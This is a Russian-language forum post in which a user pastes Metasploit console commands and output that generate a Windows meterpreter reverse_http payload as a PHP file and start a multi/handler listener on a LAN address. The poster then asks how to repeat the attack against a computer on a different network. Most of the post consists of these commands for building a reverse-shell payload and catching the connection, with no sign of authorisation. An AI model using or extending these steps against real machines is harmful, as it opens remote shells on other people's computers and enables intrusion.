Показать сообщение отдельно

  #3  
Старый 13.01.2016, 14:15
Sega
Guest
Сообщений: n/a
Провел на форуме:
8563

Репутация: 0
По умолчанию

Цитата:
Сообщение от YaBtr  
YaBtr said:

Генерируете нагрузку, например, таким образом:
Код:
Code:
msf exploit(handler) > use payload/windows/meterpreter/reverse_http
...
generate -f ololo.php -t raw
Соединение принимаете следующим образом:
Код:
Code:
msf payload(reverse_tcp) > use exploit/multi/handler
...
run
Информации по метасплоиту полно в интернете.
Код:
Code:
msf exploit(handler) > use exploit/multi/handlerInterrupt: use the 'exit' command to quit
msf exploit(handler) > use payload/windows/meterpreter/reverse_http
msf payload(reverse_http) > set LHOST 192.168.1.28
LHOST => 192.168.1.28
msf payload(reverse_http) > set LPORT 4444
LPORT => 4444
msf payload(reverse_http) > generate -f ololo.php -t raw[*] Writing 324 bytes to ololo.php...
msf payload(reverse_http) > use exploit/multi/handler
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) > set LHOST 192.168.1.28
LHOST => 192.168.1.28
msf exploit(handler) > run
[*] Started reverse TCP handler on 192.168.1.28:4444[*] Starting the payload handler...
???

Всё тоже самое нужно повторить с атакой на компьютер в другой сети.

Как понимаю для этого используется другой Еxploit.


Наведите на путь истинный.
 
Ответить с цитированием